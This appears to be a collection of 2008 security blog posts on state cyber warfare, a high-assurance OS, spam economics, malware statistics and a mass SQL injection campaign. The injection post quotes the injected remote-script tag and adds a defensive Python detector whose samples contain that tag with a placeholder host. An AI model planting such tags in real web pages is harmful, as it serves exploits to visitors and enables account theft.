Use of Cyber Warfare Will Limit U.S Freedom of Action says Intelligence


Not entirely cyber warfare related, but still a very interesting read: according to the Global Trends 2025 report by the National Intelligence Council, irregular warfare, of which cyber warfare is a part, will play a determining role in the future of the United States:

“… expanded adoption of irregular warfare tactics by both state and nonstate actors, proliferation of long-range precision weapons, and growing use of cyber warfare attacks increasingly will constrict US freedom of action.”[1]

Unfortunately this is the only mention of cyber warfare in the report, which fails to go into further detail. This shouldn’t come as a surprise to anyone though. We all know how reliant on technology everything is nowadays, and how interconnected every part of modern society is. Not only does the United States recognize that cyber warfare will be an important part of upcoming conflicts, but so do China and Russia, which are expected to become heavyweights on the world stage:

“Few countries are poised to have more impact on the world over the next 15-20 years than China. If current trends persist, by 2025 China will have the world’s second largest economy and will be a leading military power.”[2]

Right now, even with its very large armed forces of 2 million active personnel[3], China is trying to modernize its military to be more mobile and efficient. To accomplish that modernization, it has explored many new avenues that Western societies are still trying to grasp. In 1999, two Chinese Air Force colonels discussed new ways to conduct war in a guide titled “Unrestricted Warfare”, in which they describe the use of computers as new weapons for future warfare:

“With technological developments being in the process of striving to increase the types of weapons, a breakthrough in our thinking can open up the domain of the weapons kingdom at one stroke. As we see it, a single man-made stock-market crash, a single computer virus invasion, or a single rumor or scandal that results in a fluctuation in the enemy country’s exchange rates or exposes the leaders of an enemy country on the Internet, all can be included in the ranks of new-concept weapons.”[4]

Experts seem to agree that this kind of “new weapon” could do far more damage than one might imagine:

“If someone is able to attack information that is needed by decision makers, or that is crucial to organizing logistics and supply lines of an army on the ground, that means they can induce chaos in a nation,”[5] said Sami Saydjari, who worked as a Pentagon cyber expert for 13 years and now runs a private company, Cyber Defence Agency.


We don’t know how many of the concepts explained in this book have been accepted by the People’s Liberation Army (PLA), but events from the last decade can give us clues as to how far China has developed cyber warfare capabilities based on the text of the two colonels. Concrete realizations of these ideas may have happened as soon as four years after the publication of the guide, during Operation Titan Rain in 2003. With a computer network of more than 3.5 million computers spread across 65 countries, the Pentagon faces many challenges against a strong and sophisticated attack, and Operation Titan Rain proved this. According to an article on ZDNet[6], 20 hackers, based in China or using proxies based there, successfully attacked American networks in a coordinated operation:


  • At 10:23 p.m. PST, the Titan Rain hackers exploited vulnerabilities at the U.S. Army Information Systems Engineering Command at Fort Huachuca, Ariz.

  • At 1:19 a.m., they exploited the same hole in computers at the Defense Information Systems Agency in Arlington, Va.

  • At 3:25 a.m., they hit the Naval Ocean Systems Center, a Defense Department installation in San Diego, Calif.

  • At 4:46 a.m., they struck the U.S. Army Space and Strategic Defense installation in Huntsville, Ala.

The result of this operation was the theft of several pieces of classified information:

“From the Redstone Arsenal, home to the Army Aviation and Missile Command, the attackers grabbed specs for the aviation mission-planning system for Army helicopters, as well as Falconview 3.2, the flight-planning software used by the Army and Air Force,” according to Alan Paller, the director of the SANS Institute[7].

Many other attacks have since been suspected to originate from China. Attacks against most of the G7 countries, such as France[8], the UK and Germany[9], as well as against New Zealand[10] and India[11], have been reported by many media outlets.


Although the evidence gathered shows that China is aggressively pursuing irregular warfare, Russia is also gaining a strong cyber warfare reputation on the world scene. Its attack against Estonia received worldwide coverage, and subsequent attacks on Georgia gave the country experience in that domain. It is again unclear, though, whether attacks from Russia actually come from government agencies or from criminal activity.

The first incident concerning Russia goes back to 1999, before the Chinese cyber attacks. American networks came under siege in what is now called Operation Moonlight Maze. Back then, FBI officials were investigating a breach into the DOD satellite control systems. Again, while the first accusations for the source of this attack pointed at Russian authorities, it was soon shown that they were not involved in this attack[12]. The only certainty about this operation was that the attack went through a Russian proxy.

Nevertheless, Russian cyber warfare was displayed against Estonia in 2007. Once again, it was unclear whether the government was involved or whether Russian patriotism over the removal of the war memorial[13] caused Russian script kiddies and botnets to answer with a massive DDoS attack. Moscow has always denied any involvement in that case. It is also well known that the major botnets lurking on the net are often controlled by Russian cyber-criminal gangs such as the Russian Business Network. It’s quite possible that those cyber-gangs ordered their botnets to retaliate against Estonia, especially since the attack consisted mostly of denial-of-service traffic and wasn’t as sophisticated as a coordinated hacking attack on networks. Another plausible option would be that Russia’s cyber army is a mercenary force.

A repetition of the Estonia cyber attack then took place against Georgia during the Russia-Georgia conflict. The same kind of attack occurred and took down various governmental and commercial websites: HTTP floods were sent to and some other sites were hijacked and displayed fake information. The Georgian government had to put up a temporary website on Blogspot. This time, the Russian Business Network was openly suspected by many analysts of being behind the attacks[14].


McAfee claims that 120 countries around the world are now developing cyber warfare strategies[15]. It is inevitable that countries without cyber warfare capabilities will be at a great disadvantage in any arising conflict, as disruption of communications will be the first objective of any belligerent. It’s crucial that a strong offensive and defensive cyber war force be developed in order not only to defend against cyber threats, but also to wage war in cyberspace.

See also:

“Inside the Chinese Hack Attack”, Nathan Thornburgh, Time, August 25, 2005,,8599,1098371,00.html (accessed on November 21, 2008)

“Coordinated Russia vs. Georgia cyber attack in progress”, Dancho Danchev, August 11, 2008, (accessed on November 21, 2008)

[1] “Global Trends 2025: A Transformed World”, National Intelligence Council, U.S. Government, November 2008, p. XI

[2] Ibid. p. 29

[3] “The Asian Conventional Military Balance in 2006: Overview of Major Asian Powers”, Anthony H. Cordesman, Martin Kleiber, CSIS, June 26, 2006, p. 24

[4] Translation from “Unrestricted Warfare”, Qiao Liang, Wang Xiangsui, PLA Literature and Arts Publishing House, February 1999. p. 25

[5] “China flexes muscles of its ‘informationised’ army”, Ed Pilkington, Bobbie Johnson, The Guardian, September 5, 2007, (accessed on November 21, 2008)

[6] “Security experts lift lid on Chinese hack attacks”, Tom Espiner, ZDNet, November 23, 2005, (accessed on November 21, 2008)

[7] Ibid.

[8] “French government falls prey to cyber-attacks ‘involving China'”, Agence France-Presse, September 9, 2007, (accessed on November 21, 2008)

[9] “Chinese government at the center of five cyber attack claims”, Jeremy Reimer, September 14, 2007, (accessed on November 21, 2008)

[10] “New Zealand hit by foreign computer hacking”, Agence France-Presse, The Age, September 11, 2007, (accessed on November 21, 2008)

[11] “China mounts cyber attacks on Indian sites”, Indrani Bagchi, The Times of India, May 5, 2008, (accessed on November 21, 2008)

[12] “Russia hacking stories refuted”, Federal Computer Weekly, September 27, 1999, (accessed on November 21, 2008)

[13] “Estonia hit by ‘Moscow cyber war'”, BBC News, May 17, 2007, (accessed on November 21, 2008)

[14] “Georgia: Russia ‘conducting cyber war'”, Jon Swaine, The Telegraph, August 11, 2008, (accessed on November 21, 2008)

[15] “China Disputes Cyber Crime Report”, Jordan Robertson, Washington Post, November 29, 2007, (accessed on November 21, 2008)

Integrity OS to be Released Commercially


The Integrity Operating System, an OS with the highest security rating from the National Security Agency (NSA) and used by the military, will now be sold to the private sector by Integrity Global Security, a subsidiary of Green Hills Software. The commercial operating system will be based on the Integrity-178B OS, which was used in the B1B bomber in 1997 and afterwards in the F-16, F-22 and F-35 military jets. It is also used in the Airbus A380 and Boeing 787 airplanes[1].

The Integrity-178B OS has been certified EAL6+ (Evaluation Assurance Level 6+) by the NSA and is, for now, the only OS to have achieved this level of security. Most commercial operating systems such as Windows and Linux distributions have an EAL4+ certification. The EAL is a certification which indicates the degree of assurance of an operating system: level 1 covers applications that have been tested but where a security breach would not incur serious threats, while level 7, the highest level, covers applications strong enough to resist a high risk of threats and to withstand sophisticated attacks. Only one application has a level 7 certification: the Tenix Data Diode by Tenix America[2].

The Integrity OS can run by itself or with other operating systems on top of it, such as Windows, Linux, MacOS, Solaris, VxWorks, Palm OS and even Symbian OS, each OS being in its own partition so that eventual failures and security vulnerabilities are confined to that OS only.

[Table: main operating systems with the type of protection profile used and the assigned EAL[3]. The table did not survive extraction; the cells that remain are the column headers “Protection Profile” and “Security Level”, the names PR/SM LPAR Hypervisor, Solaris (and Trusted Solaris), Windows Vista and Windows XP, the profile label “Operating System”, one “EAL 6+” rating, several “EAL 4+” ratings and several cells reading “Not evaluated”; the row-to-cell mapping is lost.]

Main Operating Systems with the type of protection profile used and the assigned EAL[3]

The main feature of the Integrity OS is its use of the Separation Kernel Protection Profile (SKPP). A protection profile (PP) is a document used in the certification process which describes the security requirements for a particular problem. The SKPP is a standard developed by the NSA in which the requirements for a high-robustness operating system are defined; these requirements are based on John Rushby’s concept of a separation kernel. This concept can be summarized as:

… a single-processor model of a distributed system in which all user processes are separated in time and space from each other. In a distributed system, the execution of each process takes place in a manner independent of any other[4]

Basically, the concept is that of a computer simulating a distributed environment in which each process is independent from the others, thus preventing a corrupted or breached application from inadvertently giving access to restricted resources, as is often the case with privilege escalation in other commercial OSes.

Schema of the Integrity 178B Operating System

What makes the SKPP standard so secure is that it requires formal methods of verification during development. Furthermore, the source code is examined by a third party, in this case the NSA.

SKPP separation mechanisms, when integrated within a high assurance security architecture, are appropriate to support critical security policies for the Department of Defense (DoD), Intelligence Community, the Department of Homeland Security, Federal Aviation Administration, and industrial sectors such as finance and manufacturing.[5]

Of course, the OS might be conceived for security and toughness, but in the end it all depends on how it is used and configured… That’s going to be the real test. As much as I believe that the people who verified the OS are competent, and that all the expensive tests the company has paid for to check their operating system are rigorous, the real exam would be to release it into the wild so that hackers from all around the world can have a try at it. Hopefully, we might be able to play with this OS someday…

See also:

“U.S. Government Protection Profile for Separation Kernels in Environments Requiring High Robustness”, Information Assurance Directorate, June 29, 2007

“Formal Refinement for Operating System Kernels”, Chapter 4, p. 203-209, Iain D. Craig, Springer London, Springer Link, July 2007

“Separation kernel for a secure real-time operating system”, Rance J. DeLong, Safety Critical Embedded Systems, February 2008, p. 22

“Controlled Access Protection Profile”, Information Systems Security Organization, National Security Agency, October 8, 1999

[1] “Secure OS Gets Highest NSA Rating, Goes Commercial”, Kelly Jackson Higgins, DarkReading, November 18, 2008, (accessed on November 19, 2008)

[2] “TENIX Interactive Link solutions”, TENIX America, (accessed on November 19, 2008)

[3] “The Gold Standard for Operating System Security: SKPP”, David Kleidermacher, Integrity Global Security, 2008, (accessed on November 19, 2008)

[4] “Formal Refinement for Operating System Kernels”, Iain D. Craig, Springer London, Springer Link, July 2007, p. 203

[5] “U.S. Government Protection Profile for Separation Kernels in Environments Requiring High Robustness”, Information Assurance Directorate, June 29, 2007, p.10

International Monetary Fund Infected With Spyware


According to a misleading and largely unrelated article, FOX News reports that the International Monetary Fund (IMF) network has been infected by spyware[1]. The IMF denies any security breach or critical intrusion problems.

The article goes on to discuss various topics such as the financial crisis and the cyber security of the new president-elect, and even describes spyware as “software that is secretly installed on a computer to intercept information or take control of the system”, which is partially wrong, as spyware doesn’t necessarily imply control of the computer, and as far as I know, spyware can come bundled with software and isn’t necessarily secretly installed. It does, however, intercept information, but that could be information about surfing habits. No information is given about the data collected or the type of spyware detected, but according to FOX, “cyber-hackers” would be the cause…

The report goes on to write about Chinese attempts to develop cyber warfare capabilities, which is unrelated, and does not give any concrete information about the alleged “security breach” at the IMF. FOX News cites a spokesman, Bill Murray, saying precautions had been implemented, but didn’t report anything about an “intrusion”:

“There was no lockdown as far as I’m aware” says Murray. “I’m not aware of any major breaches, but enhanced security measures have been taken.”

Therefore, be suspicious about this story, as it seems widely exaggerated by FOX News. I’m not quite sure the author really knows what he’s talking about…

[1] “Cyber-Hackers Break Into IMF Computer System”, Richard Behar, FOX News, November 14, 2008,,2933,452348,00.html (accessed on November 17, 2008)

New Cyber Attack on the Way


A new SQL injection tool is being used to conduct a mass cyber attack on various servers across the net. It has already attacked websites such as, and[1]. Websense has observed around 1,200 servers in Europe, Asia and the U.S. containing the injection.

“Websites are being hacked and links placed on them that lead to malicious servers. We’re estimating that in the last two days alone, between 2,000 and 10,000 servers, mainly Western European and American ones, have been hacked. It’s not yet clear who’s doing this.”[2] says an analyst from

The targeted websites are usually running an ASP engine and are hacked by using stolen accounts or SQL injections. The injection adds a JavaScript line at the end of the page: <script src=http://<domain>/h.js>, where <domain> is a domain redirecting to another server. Kaspersky Lab, which first reported the attack[3], has identified 6 of those domains:


These servers will retrieve a JavaScript file (h.js) from a Chinese server, which will try various exploits against the victims. If one succeeds, it will install a variety of Trojans that will try to download even more downloaders and steal World of Warcraft accounts and other private information. All of that is done without the user’s knowledge, and could be done from legitimate websites.
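As an added example (not code from the original post, nor from Kaspersky Lab, Websense or SecureWorks), the following Python script shows a defender-side check for the symptom described above: an unexpected external script tag, written as <script src=http://<domain>/h.js> with an unquoted attribute, either appended to the rendered page or sitting in the database text columns that a mass SQL injection writes to. The allowlist host static.example.org, the placeholder domain injected-domain.invalid and the sample page and table rows are all constructed for this example.

```python
"""Flag <script src=...> tags pointing off-site, in rendered HTML and in stored text."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts this site legitimately loads scripts from. Site-specific assumption
# for the example; replace with your own allowlist.
ALLOWED_SCRIPT_HOSTS = {"static.example.org"}

# Script tag with an absolute src (quoted or not), as it sits in a database
# column before any page renders it. Group 1 = host, group 2 = path.
SCRIPT_SRC_RE = re.compile(
    r"<script\b[^>]*\bsrc\s*=\s*['\"]?(?:https?:)?//([^/'\"\s>]+)([^'\"\s>]*)",
    re.IGNORECASE,
)


class _ScriptSrcCollector(HTMLParser):
    """Collect the src attribute of every <script> start tag, quoted or unquoted."""

    def __init__(self):
        super().__init__()
        self.srcs = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        for name, value in attrs:
            if name.lower() == "src" and value:
                self.srcs.append(value.strip())


def _host_of(src):
    """Lowercase host of an absolute or protocol-relative src; '' for a relative one."""
    parsed = urlparse(src)
    return (parsed.hostname or "").lower() if parsed.netloc else ""


def find_injected_scripts(html, allowed_hosts=ALLOWED_SCRIPT_HOSTS):
    """Return (host, path) for every external script not on the allowlist."""
    collector = _ScriptSrcCollector()
    collector.feed(html)
    collector.close()
    findings = []
    for src in collector.srcs:
        host = _host_of(src)
        if host and host not in allowed_hosts:
            findings.append((host, urlparse(src).path))
    return findings


def find_injected_db_values(rows, allowed_hosts=ALLOWED_SCRIPT_HOSTS):
    """Scan (table, column, value) tuples for script tags pointing off-site."""
    findings = []
    for table, column, value in rows:
        if not isinstance(value, str):
            continue
        for host, path in SCRIPT_SRC_RE.findall(value):
            if host.lower() not in allowed_hosts:
                findings.append((table, column, host.lower(), path))
    return findings


# Constructed sample page: one legitimate script, plus the attack's trailing
# tag appended at the end. "injected-domain.invalid" is a placeholder.
SAMPLE_PAGE = """<html><head><title>Store</title>
<script src="https://static.example.org/app.js"></script></head>
<body><h1>Welcome</h1><script src=http://injected-domain.invalid/h.js></script>
</body></html>"""

# Constructed sample rows as a scheduled scan of text columns would see them.
SAMPLE_ROWS = [
    ("products", "description", "Blue widget, 10 cm"),
    ("products", "description",
     "Red widget<script src=http://injected-domain.invalid/h.js></script>"),
    ("products", "description",
     '<script src="https://static.example.org/widget.js"></script>'),
]

if __name__ == "__main__":
    for host, path in find_injected_scripts(SAMPLE_PAGE):
        print(f"page loads a script from unexpected host {host}{path}")
    for table, column, host, path in find_injected_db_values(SAMPLE_ROWS):
        print(f"{table}.{column} contains a script from {host}{path}")
```

The HTML parser accepts the unquoted src attribute exactly as the injected tag writes it, so the page-side check works on what a visitor would actually receive. The regex scan over database values catches the tag at its source: a mass SQL injection writes it into text columns first, so a periodic scan of those columns raises the alarm even before an affected page is served.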

Don Jackson, director of threat intelligence for SecureWorks, says that his team is currently in talks with the developers of the tool in order to get a copy and reverse-engineer it. Jackson claims that the attacks look like the same ones used by the Asprox botnet, but are less aggressive and stealthier. The tool also uses a digital rights management (DRM) system.

[1] “Relentless Web Attack Hard To Kill”, Kelly Jackson Higgins, DarkReading, November 11, 2008, (accessed on November 12, 2008)

[2] “Big Chinese Hack 2?”,, (accessed on November 13, 2008)

[3] Ibid.

TCP/IP Weapons Course to be Given at Black Hat Europe


For those who can get on location – and can afford it – Richard Bejtlich, from TaoSecurity, will give a 2-day course on how to detect and react to an attack on a network. The course will cover these points:

  1. Collection: What data do you need to detect intruders? How can you acquire it? What tools and platforms work, and what doesn’t? Can I build what I need?
  2. Analysis: How do you make sense of data? If intrusion detection systems are dead, what good are they? What is Network Security Monitoring (NSM)? How can I perform network forensics?
  3. Escalation: What do you do when you suspect an intrusion? How can you confirm a compromise? How should you act?
  4. Response: You’re owned — now what? Do you contain, remediate, or play dead? How do intruders react to your actions? Can you ever win?

Black Hat Europe 2009 will take place from April 14 to 17 in Amsterdam and will bring together 20 internationally renowned security specialists from around the world.


See also:

Black Hat Europe 2008 Briefings, (accessed on November 11, 2008)

How do Spammers Make Money?


A very interesting article on the BBC discussed how spammers actually earn money with their system.

Many of us might have asked ourselves “why do spammers still send their e-mails?” or “how do they make money?” After all, most computer users know about spam by now. Well, it appears that even if spammers get only one answer for every 12.5 million e-mails sent[1], that’s all they need to make the big bucks. That’s what a team from the International Computer Science Institute found out in their paper “Spamalytics: An Empirical Analysis of Spam Marketing Conversion”.

The researchers hijacked a part of the Storm botnet, which used to be one of the biggest botnets around, and rewrote a part of the command and control module of the bot. In order to measure the success of the spam campaign, the team set up two websites, one being a fake Canadian pharmacy and the other a postcard website, used to make the user download malware.

Overall, the computer scientists spawned 8 proxies and 75,869 worker bots[2]. They sent 469 million spam emails, trying to convince the recipients to buy products from the fake online pharmacy. They also made sure to distinguish the visitors to their website by separating crawlers and honeyclients from genuine clients.

Of the 350 million spams sent for the pharmacy website over a period of 26 days, only 28 people visited the purchase page of the fake website[3].

Location of the victims that visited the postcard website (white/gray dots) and the 28 victims that went to the purchase page of the pharmacy.

According to the report:

Under the assumption that our measurements are representative over time (an admittedly dangerous assumption when dealing with such small samples), we can extrapolate that, were it sent continuously at the same rate, Storm-generated pharmaceutical spam would produce roughly 3.5 million dollars of revenue in a year. This number could be even higher if spam-advertised pharmacies experience repeat business. A bit less than “millions of dollars every day”, but certainly a healthy enterprise[5].

The report can be found here.

[1] “Study shows how spammers cash in”, BBC News, November 10, 2008, (accessed on November 10, 2008)

[2] “Spamalytics: An Empirical Analysis of Spam Marketing Conversion”, Chris Kanich, Christian Kreibich, Kirill Levchenko, Brandon Enright, Geoffrey M. Voelker, Vern Paxson, Stefan Savage, International Computer Science Institute, 2008, p. 6

[3] Ibid. p.11

[4] Ibid. p.9

[5] Ibid. p.11

Microsoft: Malware Up 38% in United States in 2008


According to the latest Security Intelligence Report from Microsoft, malicious software installations on computers increased 38% in the U.S. in 2008.[1] Also, the number of “High Severity” vulnerabilities detected increased by 13% in the second half of 2007, bringing the share of “High Severity” vulnerabilities to 48%.

Downloaders and droppers account for 30% of all malicious software, with around 7 million computers infected in the United States alone.

And of course, no good Microsoft document would be complete without stating that Vista is more awesome than XP, and so the report states that if you run Windows XP SP3, you’re likely to be infected 9 times per 1,000 infections, while this number drops to 4 times per 1,000 infections for Vista.

“For browser-based attacks on Windows XP-based machines, Microsoft vulnerabilities accounted for 42 percent of the total. On Windows Vista-based machines, however, the proportion of vulnerabilities attacked in Microsoft software was much smaller, accounting for just 6 percent of the total[2].”

Taken from the report:
[Table 1.0 – Countries with the Highest Infection Rates[3]. The table did not survive extraction; the only surviving cells are a “% Chg.” column header and the country names Dominican Republic, Saudi Arabia, Former Yugoslav Republic of Macedonia, United Arab Emirates and Bosnia and Herzegovina.]

See also:

“Microsoft Security Intelligence Report”, Microsoft, January-June 2008, (accessed on November 4, 2008)

“Les menaces en augmentation de 43%, dit Microsoft”, Marie-Ève Morasse, Cyberpresse, November 3, 2008, (in French) (accessed on November 4, 2008)

[1] “Microsoft Security Intelligence Report”, Microsoft, January-June 2008, p. 122

[2] Ibid. p. 5

[3] Ibid. p.49